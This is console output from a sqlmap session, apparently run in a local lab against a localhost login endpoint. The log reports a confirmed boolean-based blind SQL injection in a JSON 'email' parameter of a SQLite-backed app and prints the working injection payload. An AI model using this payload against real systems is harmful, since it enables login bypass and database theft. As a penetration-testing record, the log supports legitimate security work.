        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:36:31 /2026-06-15/

JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[08:36:32] [INFO] resuming back-end DBMS 'sqlite' 
[08:36:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON email ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: {"email":"test' OR NOT 5909=5909-- ppZt","password":"test"}
---
[08:36:32] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[08:36:32] [WARNING] HTTP error codes detected during run:
401 (Unauthorized) - 1 times
[08:36:32] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'
[08:36:32] [WARNING] your sqlmap version is outdated

[*] ending @ 08:36:32 /2026-06-15/

